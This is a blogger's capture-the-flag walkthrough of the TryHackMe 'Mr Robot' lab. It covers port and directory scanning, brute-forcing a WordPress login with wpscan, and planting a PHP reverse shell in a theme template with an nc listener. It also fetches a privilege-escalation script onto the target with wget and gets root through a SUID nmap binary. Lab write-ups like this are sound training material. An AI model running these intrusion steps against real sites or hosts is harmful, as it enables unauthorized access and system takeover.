This is my walkthrough for Mr-Robot
TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.
About Mr Robot machine
Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.
nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
The open ports I focused on enumerating:
Web server port 80
On visiting the web page I found a website with an animation displayed in reference to the Mr Robot tv series. The animation ends at a screen which resembles a Linux terminal with a blinking cursor.
the first thing I do when I’m enumerating a webpage is to check robots.txt.
On checking /robots.txt file, I found an interesting wordlist and key file.
fsocity.dic and key-1-of-3.txt
inputting key-1-of-3.txt in the URL, I got my 1st key:
I downloaded the “fsocity.dic” wordlist file for later use.
The wordlist has about 858160 lines of words and some of the words have duplicates in the wordlist, I sorted the words:
sort fsocity.dic -u > sort fsocity.dic
After looking around I could not find any useful thing on the site I decided to use Gobuster to enumerate the web directory.
Web Directory Enumeration
gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403
Gobuster gave me more directories, observing the directory list shows that the website runs on WordPress.
I started enumerating the wp pages but could not find anything interesting, so I jump to the login page
Tried login in with default credentials admin: admin, admin: password, but the login attempts failed. After a long time of enumerating the username, I found Elliot to be a valid user (got that from the Mr Robot television series character Elliot Alderson ).
when I entered a wrong user I get invalid user and wrong pass.
When I entered elliot I got valid user but wrong pass.
Remember I downloaded a wordlist earlier, I used it and brute-force password of the username elliot.
Bruteforcing user (elliot)
Using wpscan and the wordlist I found earlier, I got the login creds :
wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic
I was able to log into wp-admin using the creds I found.
Using WordPress admin privilege which the user “elliot” has, we can get a reverse shell:
steps for resetting WordPress reverse shell:
- goto appearance/editor/ 404 template and replace the php code with php reverse shellYou can get it here:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
- Edited the following lines of php-reverse-shell.php with my local IP and reverse shell port 443:
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
- updated the script (save)
- Started ncat listener on my system with same port here as I specified in the script 443
- nc -lvp 443
- visit the “/404” error page to trigger the reverse shell. “
I got limited shell as Daemon:
Spawn a TTY Shell
upgraded my shell to tty shell, this will enable me to interact more with the shell:
python3 -c “import pty; pty.spawn(‘/bin/sh’)”;
Daemon shell does not have the privilege to access all the directories and files but can navigate some of the file systems. I moved to
/home/ directory, found another directory for the user robot. Robot, directory has 2 files.
One is the 2nd key, the other file is an md5 password hash for the user robot.
Daemon does not have read permission for key-2-of-3.txt, I can only read the key as Robot. However, I have read permission for the password.raw-md5 file, I cat the password file and got robot password md5 hash string. I cracked it on https://crackstation.net/ and obtained the password for the user robot.
Using the password I obtain from the has I successfully logged in as robot and got the 2nd flag:
su robot and input password
The first thing I do when enumerating a machine for root shell is to check things I can do using
sudo -l , with no luck, I can’t run any sudo cmd.
Privilege Escalation Script
steps I used for that:
- I cd into the dir where my lse.sh script is, run
python -m SimpleHTTPServer 8000on my machine to start the python server.
- On Mr robot machine, I cd into /tmp directory and run
wget 10. * . * . * :8000/lse.sh(http://IP:8000/les.sh).
chmod +x lse.sh
After enumerating with lse.sh, from the result I found Nmap running as SUID in the machine, that’s interesting.
Checking gtfobins we can see how to leverage on nmap to get root.
I ran the commands and got a root shell
As root, I can move into any directory or run any command without restrictions.
I moved to /root/ directory and obtained the 3rd key
This is the end.
Thanks for reading this write-up. Stay tuned and follow me on twitter to receive updates on more write-ups and thoughts on information security concepts.